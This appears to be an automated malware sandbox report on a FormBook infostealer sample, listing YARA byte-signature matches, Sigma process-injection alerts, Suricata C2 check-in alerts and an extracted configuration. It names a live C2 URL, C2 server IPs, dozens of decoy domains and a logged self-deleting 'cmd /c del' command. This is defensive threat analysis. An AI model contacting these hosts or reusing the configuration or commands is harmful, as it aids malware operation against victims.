3.2.svchost.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.svchost.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a49:$sqlite3step: 68 34 1C 7B E1 0x17b5c:$sqlite3step: 68 34 1C 7B E1 0x17a78:$sqlite3text: 68 38 2A 90 C5 0x17b9d:$sqlite3text: 68 38 2A 90 C5 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
5.2.csc.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.csc.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
5.2.csc.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
5.2.csc.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.csc.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
5.2.csc.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.csc.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
3.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
5.2.csc.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
3.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
3.2.svchost.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.svchost.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
5.2.csc.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.csc.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a49:$sqlite3step: 68 34 1C 7B E1 0x17b5c:$sqlite3step: 68 34 1C 7B E1 0x17a78:$sqlite3text: 68 38 2A 90 C5 0x17b9d:$sqlite3text: 68 38 2A 90 C5 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
0.2.Iifpj4i2kC.exe.28de9b1ad88.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.Iifpj4i2kC.exe.28de9b1ad88.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.Iifpj4i2kC.exe.28de9b1ad88.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x318909:$a1: 3C 30 50 4F 53 54 74 09 40 0x375199:$a1: 3C 30 50 4F 53 54 74 09 40 0x467371:$a1: 3C 30 50 4F 53 54 74 09 40 0x32f278:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x38bb08:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x47dce0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x31d087:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x379917:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x46baef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x327f6f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x3847ff:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x4769d7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0.2.Iifpj4i2kC.exe.28de9b1ad88.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x31bfc0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x31c23a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x378850:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x378aca:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x46aa28:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x46aca2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x327d6d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x3845fd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4767d5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x327859:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x3840e9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x4762c1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x327e6f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x3846ff:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x4768d7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x327fe7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x384877:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x476a4f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x31cc52:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x3794e2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x46b6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
0.2.Iifpj4i2kC.exe.28de9b1ad88.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x32af01:$sqlite3step: 68 34 1C 7B E1 0x32b014:$sqlite3step: 68 34 1C 7B E1 0x387791:$sqlite3step: 68 34 1C 7B E1 0x3878a4:$sqlite3step: 68 34 1C 7B E1 0x479969:$sqlite3step: 68 34 1C 7B E1 0x479a7c:$sqlite3step: 68 34 1C 7B E1 0x32af30:$sqlite3text: 68 38 2A 90 C5 0x32b055:$sqlite3text: 68 38 2A 90 C5 0x3877c0:$sqlite3text: 68 38 2A 90 C5 0x3878e5:$sqlite3text: 68 38 2A 90 C5 0x479998:$sqlite3text: 68 38 2A 90 C5 0x479abd:$sqlite3text: 68 38 2A 90 C5 0x32af43:$sqlite3blob: 68 53 D8 7F 8C 0x32b06b:$sqlite3blob: 68 53 D8 7F 8C 0x3877d3:$sqlite3blob: 68 53 D8 7F 8C 0x3878fb:$sqlite3blob: 68 53 D8 7F 8C 0x4799ab:$sqlite3blob: 68 53 D8 7F 8C 0x479ad3:$sqlite3blob: 68 53 D8 7F 8C
0.2.Iifpj4i2kC.exe.28de998d6f0.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.Iifpj4i2kC.exe.28de998d6f0.1.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.Iifpj4i2kC.exe.28de998d6f0.1.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x4a5fa1:$a1: 3C 30 50 4F 53 54 74 09 40 0x502831:$a1: 3C 30 50 4F 53 54 74 09 40 0x5f4a09:$a1: 3C 30 50 4F 53 54 74 09 40 0x4bc910:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x5191a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x60b378:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x4aa71f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x506faf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x5f9187:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x4b5607:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x511e97:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x60406f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0.2.Iifpj4i2kC.exe.28de998d6f0.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x4a9658:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x4a98d2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x505ee8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x506162:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x5f80c0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x5f833a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x4b5405:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x511c95:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x603e6d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4b4ef1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x511781:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x603959:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x4b5507:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x511d97:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x603f6f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x4b567f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x511f0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x6040e7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x4aa2ea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x506b7a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x5f8d52:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
0.2.Iifpj4i2kC.exe.28de998d6f0.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x4b8599:$sqlite3step: 68 34 1C 7B E1 0x4b86ac:$sqlite3step: 68 34 1C 7B E1 0x514e29:$sqlite3step: 68 34 1C 7B E1 0x514f3c:$sqlite3step: 68 34 1C 7B E1 0x607001:$sqlite3step: 68 34 1C 7B E1 0x607114:$sqlite3step: 68 34 1C 7B E1 0x4b85c8:$sqlite3text: 68 38 2A 90 C5 0x4b86ed:$sqlite3text: 68 38 2A 90 C5 0x514e58:$sqlite3text: 68 38 2A 90 C5 0x514f7d:$sqlite3text: 68 38 2A 90 C5 0x607030:$sqlite3text: 68 38 2A 90 C5 0x607155:$sqlite3text: 68 38 2A 90 C5 0x4b85db:$sqlite3blob: 68 53 D8 7F 8C 0x4b8703:$sqlite3blob: 68 53 D8 7F 8C 0x514e6b:$sqlite3blob: 68 53 D8 7F 8C 0x514f93:$sqlite3blob: 68 53 D8 7F 8C 0x607043:$sqlite3blob: 68 53 D8 7F 8C 0x60716b:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 25 entries

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Iifpj4i2kC.exe", ParentImage: C:\Users\user\Desktop\Iifpj4i2kC.exe, ParentProcessId: 6924, ParentProcessName: Iifpj4i2kC.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 6880, ProcessName: svchost.exe

Sigma detected: Unusual Parent Process For Cmd.EXE

Source: Process started

Author: Tim Rauch: Data: Command: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe", CommandLine: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\wlanext.exe", ParentImage: C:\Windows\SysWOW64\wlanext.exe, ParentProcessId: 6432, ParentProcessName: wlanext.exe, ProcessCommandLine: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe", ProcessId: 1908, ProcessName: cmd.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Iifpj4i2kC.exe", ParentImage: C:\Users\user\Desktop\Iifpj4i2kC.exe, ParentProcessId: 6924, ParentProcessName: Iifpj4i2kC.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 6880, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-09T12:32:56.588967+0200	2031453	1	Malware Command and Control Activity Detected	192.168.2.6	49994	3.33.130.190	80	TCP
2024-10-09T12:32:56.588967+0200	2031453	1	Malware Command and Control Activity Detected	192.168.2.6	49991	172.96.187.89	80	TCP
2024-10-09T12:33:41.057307+0200	2031453	1	Malware Command and Control Activity Detected	192.168.2.6	49900	103.235.47.188	80	TCP
2024-10-09T12:34:40.120774+0200	2031453	1	Malware Command and Control Activity Detected	192.168.2.6	49988	104.18.14.105	80	TCP
2024-10-09T12:36:43.677634+0200	2031453	1	Malware Command and Control Activity Detected	192.168.2.6	49992	44.227.65.245	80	TCP
2024-10-09T12:37:07.424803+0200	2031453	1	Malware Command and Control Activity Detected	192.168.2.6	49993	118.27.100.151	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.upcyclecharms.com/md02/"], "decoy": ["onsen1508.com", "partymaxclubmen36.click", "texasshelvingwarehouse.com", "tiantiying.com", "taxcredits-pr.com", "33mgbet.com", "equipoleiremnacional.com", "andrewghita.com", "zbbnp.xyz", "englandbreaking.com", "a1b5v.xyz", "vizamag.com", "h0lg3.rest", "ux-design-courses-17184.bond", "of84.top", "qqkartel88v1.com", "avalynkate.com", "cpuk-finance.com", "yeslabs.xyz", "webuyandsellpa.com", "barnesassetrecovery.store", "hecxion.xyz", "theopencomputeproject.net", "breezyvw.christmas", "mumazyl.com", "woby.xyz", "jalaios10.vip", "lynxpire.com", "sparkbpo.com", "333689z.com", "rslotrank.win", "adscendmfmarketing.com", "detroitreels.com", "xojiliv1.com", "mzhhxxff.xyz", "hitcomply.com", "piedge-taiko.net", "chiri.lat", "bookmygaddi.com", "hjemfinesse.shop", "zruypj169g.top", "solarfundis.com", "pittsparking.com", "teplo-invest.com", "j3k7n.xyz", "coloradoskinwellness.com", "z8ggd.com", "coinbureau.xyz", "mamasprinkleofjoy.com", "xotj7a.xyz", "nijssenadventures.com", "ysa-cn.com", "tigajco69.fun", "localhomeservicesadvisor.com", "attorney-services-8344642.zone", "rnwaifu.xyz", "nyverian.com", "family-lawyers-7009103.world", "117myw.com", "kingdom66.lat", "tdshomesolution.com", "momof2filiricans.com", "saeutah.com", "rakring.com"]}

Multi AV Scanner detection for domain / URL

Source: http://www.upcyclecharms.com/md02/www.hecxion.xyz

Virustotal: Detection: 7%

Perma Link

Multi AV Scanner detection for submitted file

Source: Iifpj4i2kC.exe	ReversingLabs: Detection: 55%
Source: Iifpj4i2kC.exe	Virustotal: Detection: 70%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Iifpj4i2kC.exe.28de9b1ad88.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Iifpj4i2kC.exe.28de998d6f0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2191414219.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4561401625.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4562425329.00000000035E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2191367276.0000000004B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4562358341.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: Iifpj4i2kC.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: wntdll.pdbUGP source: csc.exe, 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000005.00000003.2123426388.0000000005009000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000005.00000003.2130282341.00000000053DB000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000007.00000003.2193080351.0000000003553000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000007.00000002.4562530449.0000000003700000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000007.00000003.2191313736.00000000033AB000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000007.00000002.4562530449.000000000389E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: csc.exe, csc.exe, 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000005.00000003.2123426388.0000000005009000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000005.00000003.2130282341.00000000053DB000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, wlanext.exe, 00000007.00000003.2193080351.0000000003553000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000007.00000002.4562530449.0000000003700000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000007.00000003.2191313736.00000000033AB000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000007.00000002.4562530449.000000000389E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wlanext.pdb source: csc.exe, 00000005.00000002.2191462232.0000000004BE0000.00000040.10000000.00040000.00000000.sdmp, csc.exe, 00000005.00000002.2191684183.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, wlanext.exe, 00000007.00000002.4561621241.0000000000FD0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: StrongNameFreeBufferStrongNameTokenFromPublicKeyStrongNameErrorInfo.PDBdiasymreader.dllDllGetClassObject%X%X%X%X%X%X%X%X%X%X%X.TMP0x%016I64xCSCalink.dll with IAlink3 source: explorer.exe, 00000006.00000002.4579757546.000000000FFFF000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000007.00000002.4562082880.00000000033A2000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000007.00000002.4563248125.0000000003CEF000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: csc.pdb source: explorer.exe, 00000006.00000002.4579757546.000000000FFFF000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000007.00000002.4562082880.00000000033A2000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000007.00000002.4563248125.0000000003CEF000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: wlanext.pdbGCTL source: csc.exe, 00000005.00000002.2191462232.0000000004BE0000.00000040.10000000.00040000.00000000.sdmp, csc.exe, 00000005.00000002.2191684183.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000007.00000002.4561621241.0000000000FD0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: csc.pdbF source: explorer.exe, 00000006.00000002.4579757546.000000000FFFF000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000007.00000002.4562082880.00000000033A2000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000007.00000002.4563248125.0000000003CEF000.00000004.10000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 4x nop then mov rax, rcx	0_2_00007FF67FAB9FC0
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 4x nop then push rbx	0_2_00007FF67FAFCC30
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 4x nop then sub rsp, 28h	0_2_00007FF67FB27A90
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 4x nop then push rbx	0_2_00007FF67FACFAA0
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 4x nop then sub rsp, 28h	0_2_00007FF67FACF9C0
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 4x nop then push rdi	0_2_00007FF67FB24450
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 4x nop then push rdi	0_2_00007FF67FB20200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 4x nop then pop esi	5_2_0041731B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 4x nop then pop ebx	5_2_00407B20
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 4x nop then pop esi	7_2_00EE731B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 4x nop then pop ebx	7_2_00ED7B22

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49900 -> 103.235.47.188:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49900 -> 103.235.47.188:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49900 -> 103.235.47.188:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49992 -> 44.227.65.245:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49992 -> 44.227.65.245:80
